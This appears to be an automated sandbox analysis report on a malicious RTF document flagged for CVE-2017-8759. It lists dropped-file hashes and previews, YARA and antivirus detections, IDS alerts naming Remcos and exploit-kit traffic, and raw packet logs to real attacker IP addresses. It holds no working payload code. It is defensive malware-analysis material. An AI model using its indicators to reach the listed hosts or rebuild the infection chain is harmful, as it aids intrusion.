                                                Preview:..L.L.b.Z.u.i.k.i.R.L.e.A.h. .=. .".z.W.L.d.R.f.O.i.L.i.h.G.Q.".....f.x.W.k.A.W.A.p.I.k.W.G.p. .=. .".o.N.p.K.b.e.b.t.g.m.k.L.t.".....b.z.p.o.e.C.k.u.O.W.T.J.B. .=. .".A.l.K.L.c.N.S.P.W.n.L.m.u.".....L.k.U.p.b.e.n.A.u.Z.R.z.a. .=. .".p.K.l.h.K.h.L.U.n.s.b.b.i.".....p.R.p.t.b.L.A.L.p.Z.f.L.f. .=. .".G.U.H.H.a.T.G.L.R.K.G.g.U.".....m.A.W.Z.L.i.j.N.A.N.W.c.W. .=. .".W.k.n.h.W.c.W.K.u.L.b.q.P.".....G.G.i.Z.C.f.n.p.R.o.f.o.t.a.j. .=. .".p.i.G.W.u.K.t.G.W.f.L.W.W.".....Z.W.N.B.Z.i.g.f.k.g.W.O.A. .=. .".Z.k.W.W.H.d.L.L.x.T.i.U.i.".....e.P.A.L.J.v.L.Q.W.K.A.U.j. .=. .".f.K.G.U.t.h.K.s.B.C.b.m.L.".....U.L.c.W.L.T.Z.U.k.W.N.K.n. .=. .".z.a.W.L.h.n.d.U.L.h.L.i.t.".........W.u.G.a.i.c.L.N.f.K.Z.p.L. .=. .".b.p.o.K.i.K.c.h.N.A.b.c.R.".....b.H.G.g.L.R.G.P.u.d.t.i.O. .=. .".h.c.W.K.x.G.b.d.G.L.Z.o.B.".....J.h.d.U.u.l.L.N.s.e.T.W.L. .=. .".o.t.C.U.L.L.L.i.G.Z.Q.Z.I.".....S.W.N.H.e.i.N.h.o.n.e.W.K. .=. .".S.c.h.K.C.v.O.G.t.Q.k.T.K.".....H.B.B.c.O.i.T.h.u.N.Q.L.f. .=. .".b.k.Z.f.o.d.K.p.q.k.p.A.W.".....
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                Category:dropped
                                                Size (bytes):53991
                                                Entropy (8bit):5.278517042525491
                                                Encrypted:false
                                                SSDEEP:384:323tHbrN79ozVzEFH3WZ4YEw9KNrNz/wGvXpWDWOsBbOc++f6PsdeJ6ot7oQT9Az:323b3WZHqwGv5OcJRolx2AhAZqCD
                                                MD5:F3E54D580A9F92666E29A8F90DD80B9E
                                                SHA1:65722A25990AE2E4FB5F096DA1B56A22EF797186
                                                SHA-256:36191CD42B792833D28DB73F7C449A6D5C03C1AB73C365B5F29464658870DD9B
                                                SHA-512:8F32ADD6A86B55CE00FB9A7DC9094A8EF38AAD5AF228E3454B87EB73ABFA079CCD3A850C2AA459CBF9934E68E869CD5680DDD30BFE510F899992C78A915194BD
                                                Malicious:true
                                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707526
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyVFuAGlYViuWCHlkkAi/lln:vdsCkWteuAyYLvAyll
                                                MD5:5A248DD99654CB4793F2457BEE4E69C1
                                                SHA1:9DA63BD05ECA3E441B135C705B425B562E5CA494
                                                SHA-256:73FA49E819EEA9D2CA5024559E4730AC8EE873B526EA79B35082C2ED6E644C0A
                                                SHA-512:1FDB3C71240EBA121A74E2F770F17E30DB67D5812445A7FFB8AA85BE224BA36A5F3CCF818D84EA44579815F5F065AC911D2016F4DC1E4FE64073B3AF4CED3EBB
                                                Malicious:true
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                Category:dropped
                                                Size (bytes):53991
                                                Entropy (8bit):5.278517042525491
                                                Encrypted:false
                                                SSDEEP:384:323tHbrN79ozVzEFH3WZ4YEw9KNrNz/wGvXpWDWOsBbOc++f6PsdeJ6ot7oQT9Az:323b3WZHqwGv5OcJRolx2AhAZqCD
                                                MD5:F3E54D580A9F92666E29A8F90DD80B9E
                                                SHA1:65722A25990AE2E4FB5F096DA1B56A22EF797186
                                                SHA-256:36191CD42B792833D28DB73F7C449A6D5C03C1AB73C365B5F29464658870DD9B
                                                SHA-512:8F32ADD6A86B55CE00FB9A7DC9094A8EF38AAD5AF228E3454B87EB73ABFA079CCD3A850C2AA459CBF9934E68E869CD5680DDD30BFE510F899992C78A915194BD
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                File type:Rich Text Format data, version 1
                                                Entropy (8bit):2.6091410392694163
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:xnHel.rtf
                                                File size:116'087 bytes
                                                MD5:0cedaf043bf1a0c4ccef486f9ec8cbd2
                                                SHA1:d765d29e6a05ba6e72b8d718ade5f32f1379ebe5
                                                SHA256:c34202144bc27f5a4ee328d03412eecc9241d75c4bffa44f40a41ce5c7340b0c
                                                SHA512:c576785068678507e6b3b760e6732f5c8ff0734293eeadbc425808d3289f6f50efaf3ce882f6e384ba0f03430abdf81364be89109e41a0cf32c936a9a20fed61
                                                SSDEEP:768:K+RwShDWHJfw1CwwHOgaqeavIu2+0bdgBnpo0ICp:K+SEDNHwHRaqju+0RgtaNCp
                                                TLSH:38B3DFADC34F45A5DB459377031A8E0906FCB33EB70651B678AC977137AD82E08A19B8
                                                File Content Preview:{\rtf1..............{\*\lidRegroup744016165 \+}.{\204731817<^3?!06]$+?)?%?54[;5>(#!8(.6:!5_`&[`=)%2%`&??78[4-3?/.-<)|;85]>$3(;?7+>_%%.,;57;?[;%8.0.<?75@.'5(8$2?6=#)7'4(|:91,,/+)6&:4&'56%?7??=?.*]=9?45%_72)$-@3#$[(1??.0@..)%>*21/.?5?@:_5|.!2@@7;?&$)=&?,/%2
                                                Icon Hash:2764a3aaaeb7bdbf
                                                Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                000001B1Fhno
                                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                2024-09-11T20:22:23.606116+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 207.241.227.96 | 443 | 192.168.2.22 | 49162 | TCP
                                                2024-09-11T20:22:24.732832+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 45.90.89.123 | 80 | 192.168.2.22 | 49163 | TCP
                                                2024-09-11T20:22:24.732832+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 45.90.89.123 | 80 | 192.168.2.22 | 49163 | TCP
                                                2024-09-11T20:22:29.656144+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49164 | 45.90.89.98 | 8243 | TCP
                                                2024-09-11T20:22:31.383018+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49165 | 178.237.33.50 | 80 | TCP
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Sep 11, 2024 20:22:16.762609005 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762620926 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762633085 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762662888 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762675047 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762676954 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762686968 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762698889 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762726068 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762758970 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763036966 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763381004 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763422012 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763427973 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763433933 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763454914 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763467073 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763514996 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763528109 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763537884 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763557911 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763570070 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763879061 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763921022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763937950 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763951063 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763972044 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763983011 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764030933 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764045000 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764050961 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764056921 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764112949 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764148951 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764188051 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764220953 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764262915 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764833927 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764847040 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764858961 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764902115 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764942884 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764955044 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764966965 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764981031 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764995098 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765014887 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765074968 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765089035 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765131950 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765748024 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765794992 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765796900 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765808105 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765876055 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765976906 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765990973 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766002893 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766015053 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766025066 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766045094 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766186953 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766200066 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766231060 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766695023 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766748905 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766773939 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766788006 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766815901 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766844034 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766890049 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766906023 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766917944 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766928911 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766940117 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766942024 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766954899 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766972065 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.767009020 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.767050982 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768616915 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768668890 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768676043 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768691063 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768711090 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768728018 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768742085 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768754005 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768764019 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768780947 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768795013 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893058062 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893110991 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893167019 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893202066 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893235922 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893235922 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893235922 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893275976 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893294096 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893338919 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893352985 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893395901 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893413067 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893457890 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893465996 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893501997 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893511057 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893536091 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893543005 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893568993 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893575907 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893614054 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893619061 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893656969 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893666029 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893688917 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893696070 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893728018 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893733978 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893759012 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893767118 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893798113 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893812895 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893860102 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893867016 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893902063 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893910885 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893950939 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893953085 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893995047 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894002914 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894037008 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894047022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894071102 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894077063 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894105911 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894112110 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894140005 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894154072 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894171953 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894172907 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894212961 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894222975 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894258022 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894289017 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894294977 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894328117 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894340992 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894382000 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894388914 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894424915 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894428968 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894459009 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894464970 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894495010 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894499063 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894527912 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894534111 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894562960 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894567966 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894598007 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894599915 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894632101 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894639969 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894665956 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894670010 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894704103 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894704103 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894747019 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:17.501527071 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:20.658941984 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:20.658993006 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:20.659040928 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:20.664865017 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:20.664894104 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.539673090 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.539803028 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.547404051 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.547419071 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.548783064 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.629261017 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.675414085 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999780893 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999864101 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999883890 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999902964 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999927998 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.999959946 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999972105 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.999978065 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999995947 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.999996901 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.000015020 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.000017881 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.000044107 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.000062943 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.000082970 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.000633001 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.063827991 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.063925982 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.063967943 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.063998938 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.064033031 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.070578098 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.150960922 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.151047945 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.151065111 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.151096106 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.151130915 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.213587046 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213666916 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.213706017 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213733912 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213804960 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.213804007 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213839054 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213874102 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.214413881 CEST44349162207.241.227.96192.168.2.22
